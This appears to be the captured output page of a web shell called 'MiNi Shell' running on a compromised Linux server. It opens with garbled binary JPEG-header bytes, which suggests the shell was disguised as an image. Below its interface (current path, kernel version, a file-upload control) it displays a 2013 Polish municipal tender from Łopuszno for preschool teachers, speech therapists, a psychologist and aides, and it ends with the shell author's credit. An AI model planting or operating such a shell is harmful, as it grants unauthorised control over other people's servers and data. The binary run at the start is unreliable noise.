JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/home/vmanager/www/common/web/tenders/20130917/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/home/vmanager/www/common/web/tenders/20130917/377094-N-2013.html

<p class="kh_header"><b>Łopuszno: Zatrudnienie nauczycieli / instruktorów prowadzących zajęcia oraz pomocy nauczyciela w ramach projektu RADOSNE PRZEDSZKOLAKI</b><br>
<b>Numer ogłoszenia: 377094 - 2013; data zamieszczenia: 17.09.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Łopuszno , ul. Konecka 12, 26-070 Łopuszno, woj. świętokrzyskie, tel. 41 3914009, faks 41 3914054.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.lopuszno.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zatrudnienie nauczycieli / instruktorów prowadzących zajęcia oraz pomocy nauczyciela w ramach projektu RADOSNE PRZEDSZKOLAKI.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zatrudnienie nauczycieli / instruktorów prowadzących zajęcia oraz pomocy nauczyciela w ramach projektu Radosne Przedszkolaki, Priorytet IX - Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1 Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty. 
1) Zakres i wielkość realizacji usług objętych przedmiotem zamówienia: 
Przedmiot zamówienia:
Przedmiotem zamówienia jest zatrudnienie nauczycieli wychowania przedszkolnego 
i nauczycieli / instruktorów prowadzących zajęcia oraz pomocy nauczyciela w ramach projektu Radosne Przedszkolaki, Priorytet IX - Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1 Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty.
Celem głównym projektu jest upowszechnienie edukacji przedszkolnej oraz zmniejszenie różnic w dostępie do wychowania przedszkolnego i podniesienie jakości oferty edukacyjnej dla 46 dzieci w Gminie Łopuszno do 30.06.2015 r. 
Projekt jest realizowany w poniższych szkołach:
- Szkoła Podstawowa w Dobrzeszowie, Dobrzeszów Nr 70, 26-070 Łopuszno;
- Szkoła Podstawowa w Dobrzeszowie Filia w Sarbicach, Sarbice Drugie Nr 1, 26-070 Łopuszno. 
W ramach świadczonej usługi Wykonawca zobowiązany będzie wykonać następujące czynności: 
1. realizacja podstawy Programowej Wychowania Przedszkolnego określoną przepisami prawa (Rozporządzenie Ministra Edukacji Narodowej z dnia 23.12.2008r. w sprawie podstawy programowej wychowania przedszkolnego oraz kształcenia ogólnego w poszczególnych typach szkół, opublikowane w Dz. U. z 2009 r. Nr 4, poz. 17). 
2. przygotowanie programu zajęć ukierunkowanego na realizację celu głównego projektu, ze szczególnym uwzględnieniem rozwijania i rozszerzania kompetencji dzieci uczestniczących do przedszkoli,
3. prowadzenie zajęć dydaktycznych rozwijających kompetencje, zgodnie z potrzebami edukacyjnymi dzieci uczęszczających do przedszkoli z wykorzystaniem form, metod i środków odpowiednich dla uczenia się Beneficjentów, według ustalonego harmonogramu, 
4. dokonywanie oceny postępów Beneficjentów, 
5. dokumentowanie przeprowadzenia każdego zajęcia z dziećmi poprzez wpisy do dziennika zajęć,
6. gromadzenie dokumentacji fotograficznej realizowanego zadania, 
7. współpraca z Koordynatorem projektu w zakresie monitoringu oraz ewaluacji projektu, 
8. współpraca z personelem zarządzającym projektem, 
9. promowanie projektu i praca zgodna z wytycznymi projektu, 
10. wykonywanie innych bieżących zadań niezbędnych do prawidłowej realizacji projektu. 
Zajęcia odbywać się będą w: 
Punkt przedszkolny w Szkole Podstawowej w Dobrzeszowie 
jedna grupa 3-4 latków w okresie IX. 2013 -VI. 2015 (bez lipca 2014)
Punkt przedszkolny w Szkole Podstawowej w Dobrzeszowie Filii w Sarbicach
jedna grupa 3-5 latków w okresie IX. 2013 -VI. 2015 (bez lipca 2014)

Prowadzenie zajęć z edukacji przedszkolnej
W punkcie przedszkolnym w Szkole Podstawowej w Dobrzeszowie
jedna grupa 3-4 latków - 10 godzin w tygodniu (60 minut jedna godzina) - w okresie IX. 2013r. -VI. 2015r. (bez lipca 2014r.) 
Dwóch nauczycieli zatrudnionych na umowę zlecenie
Jeden nauczyciel w wymiarze 25/25 - 1 etat
Jeden nauczyciel w wymiarze 20/25 - etatu

W punkcie przedszkolnym w Szkole Podstawowej w Dobrzeszowie Filii w Sarbicach
jedna grupa 3-5 latków - 6 godzin w tygodniu (60 minut jedna godzina) - w okresie IX. 2013r. -VI. 2015r. (bez lipca 2014r.)
Jeden nauczyciel w wymiarze 25/25 - 1 etat, zatrudniony na umowę zlecenie

Prowadzenie zajęć z rytmiki 

W punkcie przedszkolnym w Szkole Podstawowej w Dobrzeszowie
jedna grupa 3-4 latków - 2 razy w tygodniu po 30 min. - 158 godzin w okresie IX. 2013r. -VI. 2015r. (bez lipca 2014r.)

W punkcie przedszkolnym w Szkole Podstawowej w Dobrzeszowie Filii w Sarbicach
jedna grupa 3-5 latków - 2 razy w tygodniu po 30 min. - 158 godzin w okresie IX. 2013r. -VI. 2015r. (bez lipca 2014r.)

Prowadzenie zajęć z języka angielskiego 

W punkcie przedszkolnym w Szkole Podstawowej w Dobrzeszowie
jedna grupa 3-4 latków - 1 raz w tygodniu po 30 min. - 79 godzin w okresie IX. 2013r. -VI. 2015r. (bez lipca 2014r.)

W punkcie przedszkolnym w Szkole Podstawowej w Dobrzeszowie Filii w Sarbicach
Jedna grupa 3-5 latków - 1 raz w tygodniu po 30 min. - 79 godzin w okresie IX. 2013r. -VI. 2015r. (bez lipca 2014r.)

Prowadzenie zajęć ekologicznych

W punkcie przedszkolnym w Szkole Podstawowej w Dobrzeszowie
jedna grupa 3-4 latków - 1 raz w tygodniu po 30 min. - 79 godzin w okresie IX. 2013r. -VI. 2015r. (bez lipca 2014r.)

W punkcie przedszkolnym w Szkole Podstawowej w Dobrzeszowie Filii w Sarbicach
jedna grupa 3-5 latków - 1 raz w tygodniu po 30 min. - 79 godzin w okresie IX. 2013r. -VI. 2015r. (bez lipca 2014r.)

Prowadzenie zajęć logopedycznych

W punkcie przedszkolnym w Szkole Podstawowej w Dobrzeszowie
jedna grupa 3-4 latków - 2 razy w miesiącu po 30 min. - 42 godziny w okresie IX. 2013r. -VI. 2015r. (bez lipca 2014r.)

W punkcie przedszkolnym w Szkole Podstawowej w Dobrzeszowie Filii w Sarbicach
jedna grupa 3-5 latków - 2 razy w miesiącu po 30 min. - 42 godziny w okresie IX. 2013r. -VI. 2015r. (bez lipca 2014r.)

Prowadzenie zajęć z psychologiem
W punkcie przedszkolnym w Szkole Podstawowej w Dobrzeszowie
jedna grupa 3-4 latków - 2 razy w miesiącu po 30 min. - 42 godziny w okresie IX. 2013r. -VI. 2015r. (bez lipca 2014r.)

W punkcie przedszkolnym w Szkole Podstawowej w Dobrzeszowie Filii w Sarbicach
jedna grupa 3-5 latków - 2 razy w miesiącu  po 30 min. - 42 godziny w okresie IX. 2013r. -VI. 2015r. (bez lipca 2014r.)

Pomoc nauczyciela 
Pomoc nauczyciela w Punkcie przedszkolnym Szkoły Podstawowej w Dobrzeszowie oraz w Punkcie przedszkolnym Szkoły Podstawowej w Dobrzeszowie Filii w Sarbicach w pełnym wymiarze czasu pracy.
Zakres zamówienia:
Pełnienie funkcji pomocy do dzieci, której zadaniem będzie: wspomaganie nauczyciela w przygotowywaniu i prowadzeniu zajęć, dbanie o porządek w czasie zajęć i po ich zakończeniu, dbanie o estetykę pomieszczeń i mienie szkoły, opieka nad uczniami w czasie spacerów i wycieczek, wspieranie uczniów w czynnościach samoobsługowych (ubieraniu, jedzeniu, wyjściach do toalety, myciu rąk), dbanie o wygląd dzieci, odbiór dzieci od rodziców przed zajęciami i przekazywanie ich rodzicom po zajęciach, dbałość o przestrzeganie w placówce zasad bhp, dbanie o czystość i porządek w przydzielonych pomieszczeniach.
UWAGA! Pod pojęciem godziny Zamawiający rozumie 60 min.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.11.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego sposobu spełnienia tego warunku</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego sposobu spełnienia tego warunku</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego sposobu spełnienia tego warunku</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nauczyciel edukacji przedszkolnej
Dyplom ukończenia studiów magisterskich lub zawodowych na kierunku edukacja przedszkolna z przygotowaniem pedagogicznym, lub wykształcenie wyższe pedagogiczne w zakresie nadającym kwalifikacje do pracy w przedszkolach lub w klasach I - III szkół podstawowych, świadectwo ukończenia studiów podyplomowych lub kursu kwalifikacyjnego w zakresie wczesnego nauczania.
Nauczyciel stażysta 2 etaty.
Nauczyciel dyplomowany 20/25 etatu.

Nauczyciel edukacji ekologicznej
Dyplom ukończenia studiów magisterskich lub zawodowych na kierunku edukacja przedszkolna z przygotowaniem pedagogicznym, lub wykształcenie wyższe pedagogiczne w zakresie nadającym kwalifikacje do pracy w przedszkolach lub w klasach I - III szkół podstawowych, świadectwo ukończenia studiów podyplomowych lub kursu kwalifikacyjnego w zakresie wczesnego nauczania.

Nauczyciel / instruktor języka angielskiego 
Dyplom ukończenia studiów magisterskich na kierunku filologia angielska z przygotowaniem pedagogicznym, lub wykształcenie wyższe pedagogiczne magisterskie  w zakresie nadającym kwalifikacje do pracy w przedszkolach lub w klasach I - III szkół podstawowych, ponadto świadectwo znajomości danego języka obcego w zakresie co najmniej podstawowym oraz świadectwo ukończenia studiów podyplomowych lub kursu kwalifikacyjnego w zakresie wczesnego nauczania języka angielskiego, lub dyplom ukończenia nauczycielskiego kolegium języka angielskiego, lub dyplom ukończenia studiów magisterskich lub zawodowych na dowolnym kierunku i świadectwo państwowego nauczycielskiego egzaminu z języka angielskiego stopnia II.

Nauczyciel / instruktor rytmiki 
Wykształcenie wyższe kierunkowe z przygotowaniem pedagogicznym lub wykształcenie średnie z ukończonym studium nauczycielskim

Nauczyciel / instruktor logopedii 
Wykształcenie wyższe w zakresie logopedii z przygotowaniem pedagogicznym, lub wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym oraz studia podyplomowe w zakresie logopedii, dokument potwierdzający posiadane kwalifikacje.

Psycholog 
Wykształcenie wyższe w zakresie psychologii z przygotowaniem pedagogicznym, lub wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym oraz studia podyplomowe w zakresie psychologii, dokument potwierdzający posiadane kwalifikacje.

Pomoc nauczyciela
Wykształcenie co najmniej średnie, umiejętność wykonywania czynności, dokument potwierdzający posiadane wykształcenie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego sposobu spełnienia tego warunku</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Dokumenty potwierdzające kwalifikacje osób, które będą uczestniczyć w wykonaniu zamówienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Projekt umowy stanowi Załącznik nr 6 do Specyfikacji Istotnych Warunków Zamówienia.
2. Zamawiający przewiduje możliwość następujących zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy:
1) zmiana terminu wykonania zamówienia w przypadku zmiany umowy o dofinansowanie projektu Radosne przedszkolaki
2) zmiana osób, które będą uczestniczyć w wykonywaniu zamówienia w szczególności w przypadku choroby lub innych zdarzeń losowych uniemożliwiających pełnienie funkcji zgodnie z zawarta umową. W przypadku zmiany, nowa osoba musi spełniać wymagania określone w Rozdziale V.2 SIWZ. Zmiany umowy mogą zostać dokonane pod warunkiem przedłożenia Zamawiającemu pisemnego uzasadnienia konieczności wprowadzenia zmiany, przedłożenia dokumentów potwierdzających odpowiednie kwalifikacje oraz wyrażenia zgody przez Zamawiającego na tę zmianę.
3. Zamawiający przewiduje również możliwość wprowadzenia zmian do treści zawartej umowy dokonane na podst. art. 144 ust. 1 ustawy Prawo zamówień publicznych w zakresie zmian nieistotnych, rozumianych w ten sposób, że wiedza o ich wprowadzeniu do umowy na etapie postępowania o udzielenie zamówienia nie wpłynęłaby na krąg podmiotów ubiegających się o udzielenie zamówienia czy też wynik postępowania.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.lopuszno.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Łopusznie, ul. Konecka 12, 26-070 Łopuszno - pokój Nr 4.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.09.2013 godzina 10:00, miejsce: Urząd Gminy w Łopusznie, ul. Konecka 12, 26-070 Łopuszno - pokój Nr 5 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt pn. RADOSNE PRZEDSZKOLAKI realizowany jest ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Priorytet IX - Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1 Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com